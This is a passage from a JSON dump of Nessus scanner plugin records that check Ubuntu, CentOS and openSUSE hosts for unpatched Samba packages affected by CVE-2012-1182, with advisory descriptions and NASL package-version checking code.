(CVE-2012-1182).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1423-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected samba package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/13\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2012-2019 Canonical, Inc. / NASL script (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(8\\.04|10\\.04|11\\.04|11\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 8.04 / 10.04 / 11.04 / 11.10\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"8.04\", pkgname:\"samba\", pkgver:\"3.0.28a-1ubuntu4.18\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"samba\", pkgver:\"2:3.4.7~dfsg-1ubuntu3.9\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"samba\", pkgver:\"2:3.5.8~dfsg-1ubuntu2.4\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"samba\", pkgver:\"2:3.5.11~dfsg-1ubuntu2.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:28:32", "description": "Updated samba4 packages that fix one security issue, multiple bugs,\nand add various enhancements are now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler, used to generate code to handle RPC calls. This could result\nin code generated by the PIDL compiler to not sufficiently protect\nagainst buffer overflows. 
(CVE-2012-1182)\n\nThe samba4 packages have been upgraded to upstream version 4.0.0,\nwhich provides a number of bug fixes and enhancements over the\nprevious version. In particular, improved interoperability with Active\nDirectory (AD) domains. SSSD now uses the libndr-krb5pac library to\nparse the Privilege Attribute Certificate (PAC) issued by an AD Key\nDistribution Center (KDC).\n\nThe Cross Realm Kerberos Trust functionality provided by Identity\nManagement, which relies on the capabilities of the samba4 client\nlibrary, is included as a Technology Preview. This functionality and\nserver libraries, is included as a Technology Preview. This\nfunctionality uses the libndr-nbt library to prepare Connection-less\nLightweight Directory Access Protocol (CLDAP) messages.\n\nAdditionally, various improvements have been made to the Local\nSecurity Authority (LSA) and Net Logon services to allow verification\nof trust from a Windows system. Because the Cross Realm Kerberos Trust\nfunctionality is considered a Technology Preview, selected samba4\ncomponents are considered to be a Technology Preview. For more\ninformation on which Samba packages are considered a Technology\nPreview, refer to Table 5.1, 'Samba4 Package Support' in the Release\nNotes, linked to from the References. (BZ#766333, BZ#882188)\n\nThis update also fixes the following bug :\n\n* Prior to this update, if the Active Directory (AD) server was\nrebooted, Winbind sometimes failed to reconnect when requested by\n'wbinfo -n' or 'wbinfo -s' commands. Consequently, looking up users\nusing the wbinfo tool failed. This update applies upstream patches to\nfix this problem and now looking up a Security Identifier (SID) for a\nusername, or a username for a given SID, works as expected after a\ndomain controller is rebooted. 
(BZ#878564)\n\nAll users of samba4 are advised to upgrade to these updated packages,\nwhich fix these issues and add these enhancements.\n\nWarning: If you upgrade from Red Hat Enterprise Linux 6.3 to Red Hat\nEnterprise Linux 6.4 and you have Samba in use, you should make sure\nthat you uninstall the package named 'samba4' to avoid conflicts\nduring the upgrade.", "edition": 25, "published": "2013-03-10T00:00:00", "title": "CentOS 6 : samba4 (CESA-2013:0506)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "modified": "2013-03-10T00:00:00", "cpe": ["p-cpe:/a:centos:centos:samba4-common", "p-cpe:/a:centos:centos:samba4-libs", "cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:samba4-pidl", "p-cpe:/a:centos:centos:samba4-winbind-krb5-locator", "p-cpe:/a:centos:centos:samba4-client", "p-cpe:/a:centos:centos:samba4-dc", "p-cpe:/a:centos:centos:samba4-devel", "p-cpe:/a:centos:centos:samba4-winbind", "p-cpe:/a:centos:centos:samba4", "p-cpe:/a:centos:centos:samba4-winbind-clients", "p-cpe:/a:centos:centos:samba4-dc-libs", "p-cpe:/a:centos:centos:samba4-test", "p-cpe:/a:centos:centos:samba4-python", "p-cpe:/a:centos:centos:samba4-swat"], "id": "CENTOS_RHSA-2013-0506.NASL", "href": "https://www.tenable.com/plugins/nessus/65141", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0506 and \n# CentOS Errata and Security Advisory 2013:0506 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65141);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"RHSA\", value:\"2013:0506\");\n\n script_name(english:\"CentOS 6 : samba4 (CESA-2013:0506)\");\n script_summary(english:\"Checks rpm output for 
the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated samba4 packages that fix one security issue, multiple bugs,\nand add various enhancements are now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler, used to generate code to handle RPC calls. This could result\nin code generated by the PIDL compiler to not sufficiently protect\nagainst buffer overflows. (CVE-2012-1182)\n\nThe samba4 packages have been upgraded to upstream version 4.0.0,\nwhich provides a number of bug fixes and enhancements over the\nprevious version. In particular, improved interoperability with Active\nDirectory (AD) domains. SSSD now uses the libndr-krb5pac library to\nparse the Privilege Attribute Certificate (PAC) issued by an AD Key\nDistribution Center (KDC).\n\nThe Cross Realm Kerberos Trust functionality provided by Identity\nManagement, which relies on the capabilities of the samba4 client\nlibrary, is included as a Technology Preview. This functionality and\nserver libraries, is included as a Technology Preview. 
This\nfunctionality uses the libndr-nbt library to prepare Connection-less\nLightweight Directory Access Protocol (CLDAP) messages.\n\nAdditionally, various improvements have been made to the Local\nSecurity Authority (LSA) and Net Logon services to allow verification\nof trust from a Windows system. Because the Cross Realm Kerberos Trust\nfunctionality is considered a Technology Preview, selected samba4\ncomponents are considered to be a Technology Preview. For more\ninformation on which Samba packages are considered a Technology\nPreview, refer to Table 5.1, 'Samba4 Package Support' in the Release\nNotes, linked to from the References. (BZ#766333, BZ#882188)\n\nThis update also fixes the following bug :\n\n* Prior to this update, if the Active Directory (AD) server was\nrebooted, Winbind sometimes failed to reconnect when requested by\n'wbinfo -n' or 'wbinfo -s' commands. Consequently, looking up users\nusing the wbinfo tool failed. This update applies upstream patches to\nfix this problem and now looking up a Security Identifier (SID) for a\nusername, or a username for a given SID, works as expected after a\ndomain controller is rebooted. 
(BZ#878564)\n\nAll users of samba4 are advised to upgrade to these updated packages,\nwhich fix these issues and add these enhancements.\n\nWarning: If you upgrade from Red Hat Enterprise Linux 6.3 to Red Hat\nEnterprise Linux 6.4 and you have Samba in use, you should make sure\nthat you uninstall the package named 'samba4' to avoid conflicts\nduring the upgrade.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2013-March/019498.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c7fd5e17\"\n );\n # https://lists.centos.org/pipermail/centos-cr-announce/2013-February/000689.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?189565c5\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba4 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-1182\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-common\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-dc-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-pidl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-client-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-common-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-dc-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-dc-libs-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-devel-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-libs-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-pidl-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-python-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", 
reference:\"samba4-swat-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-test-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-winbind-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-winbind-clients-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-winbind-krb5-locator-4.0.0-55.el6.rc4\")) flag++;\n\n\nif (flag)\n{\n cr_plugin_caveat = '\\n' +\n 'NOTE: The security advisory associated with this vulnerability has a\\n' +\n 'fixed package version that may only be available in the continuous\\n' +\n 'release (CR) repository for CentOS, until it is present in the next\\n' +\n 'point release of CentOS.\\n\\n' +\n\n 'If an equal or higher package level does not exist in the baseline\\n' +\n 'repository for your major version of CentOS, then updates from the CR\\n' +\n 'repository will need to be applied in order to address the\\n' +\n 'vulnerability.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + cr_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba4 / samba4-client / samba4-common / samba4-dc / samba4-dc-libs / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:27:39", "description": "Updated samba packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5 and 6; Red Hat Enterprise Linux 5.3\nLong Life; and Red Hat Enterprise Linux 5.6, 6.0 and 6.1 Extended\nUpdate Support.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. 
A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler,\nused to generate code to handle RPC calls, resulted in multiple buffer\noverflows in Samba. A remote, unauthenticated attacker could send a\nspecially crafted RPC request that would cause the Samba daemon (smbd)\nto crash or, possibly, execute arbitrary code with the privileges of\nthe root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing\nthis update, the smb service will be restarted automatically.", "edition": 25, "published": "2012-04-11T00:00:00", "title": "CentOS 5 / 6 : samba (CESA-2012:0465)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "modified": "2012-04-11T00:00:00", "cpe": ["p-cpe:/a:centos:centos:samba-swat", "p-cpe:/a:centos:centos:samba-domainjoin-gui", "p-cpe:/a:centos:centos:samba-winbind-krb5-locator", "cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:samba-winbind", "p-cpe:/a:centos:centos:samba-doc", "p-cpe:/a:centos:centos:samba-common", "p-cpe:/a:centos:centos:samba-winbind-clients", "p-cpe:/a:centos:centos:samba-client", "p-cpe:/a:centos:centos:samba", "p-cpe:/a:centos:centos:libsmbclient", "p-cpe:/a:centos:centos:libsmbclient-devel", "cpe:/o:centos:centos:5", "p-cpe:/a:centos:centos:samba-winbind-devel"], "id": "CENTOS_RHSA-2012-0465.NASL", "href": "https://www.tenable.com/plugins/nessus/58663", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red 
Hat Security Advisory RHSA-2012:0465 and \n# CentOS Errata and Security Advisory 2012:0465 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58663);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_xref(name:\"RHSA\", value:\"2012:0465\");\n\n script_name(english:\"CentOS 5 / 6 : samba (CESA-2012:0465)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated samba packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5 and 6; Red Hat Enterprise Linux 5.3\nLong Life; and Red Hat Enterprise Linux 5.6, 6.0 and 6.1 Extended\nUpdate Support.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler,\nused to generate code to handle RPC calls, resulted in multiple buffer\noverflows in Samba. A remote, unauthenticated attacker could send a\nspecially crafted RPC request that would cause the Samba daemon (smbd)\nto crash or, possibly, execute arbitrary code with the privileges of\nthe root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. 
After installing\nthis update, the smb service will be restarted automatically.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2012-April/018562.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0d314040\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2012-April/018565.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e85d5c5a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-1182\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-doc\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:centos:centos:samba-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-winbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x / 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"libsmbclient-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"libsmbclient-devel-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba-client-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba-common-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba-swat-3.0.33-3.39.el5_8\")) flag++;\n\nif (rpm_check(release:\"CentOS-6\", reference:\"libsmbclient-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"libsmbclient-devel-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-client-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-common-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-doc-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-domainjoin-gui-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-swat-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-winbind-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-winbind-clients-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-winbind-devel-3.5.10-115.el6_2\")) flag++;\nif 
(rpm_check(release:\"CentOS-6\", reference:\"samba-winbind-krb5-locator-3.5.10-115.el6_2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libsmbclient / libsmbclient-devel / samba / samba-client / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:24:45", "description": "Samba upgrade to version 3.6.3 fixes the following security issue :\n\n - PIDL based autogenerated code allows overwriting beyond\n of allocated array. Remove attackers could exploit that\n to execute arbitrary code as root (CVE-2012-1182,\n bso#8815, bnc#752797)\n\nPlease see /usr/share/doc/packages/samba/WHATSNEW.txt from the\nsamba-doc package or the package change log (rpm -q --changelog samba)\nfor more details of the version update.", "edition": 18, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : samba (openSUSE-SU-2012:0508-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:samba-winbind-debuginfo-32bit", "p-cpe:/a:novell:opensuse:samba-devel", "p-cpe:/a:novell:opensuse:samba", "p-cpe:/a:novell:opensuse:libtevent0-debuginfo", "p-cpe:/a:novell:opensuse:libldb-devel", 